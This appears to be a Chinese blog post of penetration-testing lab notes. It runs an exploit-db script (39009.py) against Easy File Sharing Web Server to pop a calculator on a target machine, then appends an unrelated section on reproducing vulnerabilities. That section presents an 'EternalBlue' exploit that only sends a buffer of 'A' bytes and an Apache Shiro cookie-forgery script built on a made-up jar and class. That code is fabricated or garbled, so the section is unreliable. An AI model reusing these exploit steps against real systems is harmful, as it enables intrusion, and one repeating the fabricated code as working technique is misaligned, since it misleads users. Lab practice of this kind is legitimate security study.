网络渗透复现A

一、漏洞渗透测试
1、靶机安装easy file sharing web server(efssetup_2018.zip)
2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100
3、利用该漏洞,使得靶机运行计算器。P116-119

实验过程

靶机安装efssetup

配置8000端口

查找EasyFileSharing的有关漏洞

searchsploit Easy File Sharing Web Server

再输入

python /usr/share/exploitdb/exploits/windows/remote/39009.py 开放服务的靶机的ip(被控端) 8000 

最后观察到,靶机弹出了计算器,并且easy file软件崩溃闪退;

二、Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制

### 如何研究和复现最新的网络安全漏洞 #### 资料准备 为了有效开展网络安全漏洞的研究与复现工作,需要具备全面的理论知识和技术支持。可以从以下方面着手准备: - 获取权威的安全书籍作为基础知识储备[^1]。 - 利用工具包中的各类渗透测试软件辅助实验环境搭建。 - 学习并掌握实际案例中的源码实现细节以及其背后的设计原理。 #### 实战演练 通过具体实例加深理解是非常重要的环节之一。例如针对“永恒之蓝”这一经典场景展开深入探讨[^2]: ```python import socket from struct import pack def exploit_eternalblue(target_ip, target_port=445): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) # 构造恶意数据包 (简化版本用于演示目的) buffer_size = 1024 * b"A" payload = pack("<I", len(buffer_size)) + buffer_size s.send(payload) response = s.recv(1024).decode('utf-8') print(f"[+] Response from {target_ip}: {response}") except Exception as e: print(f"[-] Error occurred while exploiting EternalBlue on {target_ip}. Details: {str(e)}") if __name__ == "__main__": target_host = input("[*] Enter Target Host IP Address: ") exploit_eternalblue(target_host) ``` 上述脚本仅为教学用途展示如何向目标主机发送特定格式的数据触发潜在缺陷。 #### 漏洞利用框架应用 某些情况下可以直接借助现有的开源项目快速验证假设条件下的可行性方案。比如基于Apache Shiro框架开发的应用程序可能存在Remember Me功能相关的认证绕过风险[^3]。此时可通过如下方式尝试获取Web Shell控制权: ```bash #!/bin/bash # 设置参数变量 URL="http://example.com/login" COOKIE_NAME="_rememberMe" # 创建伪造Cookie值 SER=`java -cp /path/to/sherlock.jar com.tangosol.coherence.security.Sherlock --encrypt ""` FORGED_COOKIE="${COOKIE_NAME}=${SER}" curl -X POST \ -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" \ -b "${FORGED_COOKIE}" \ -d 'username=admin&password=password' \ ${URL} ``` 此方法依赖于Java序列化机制特性完成非法登录过程模拟。 #### 新型威胁跟踪 持续关注行业动态确保第一时间了解到高危零日漏洞情报至关重要。近期VMware系列产品暴露出严重的RCE隐患即为典型代表事件[^4]。研究人员应当仔细阅读官方补丁说明文档寻找可能存在的逻辑错误或者未完全修复之处进一步挖掘深层次问题所在。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值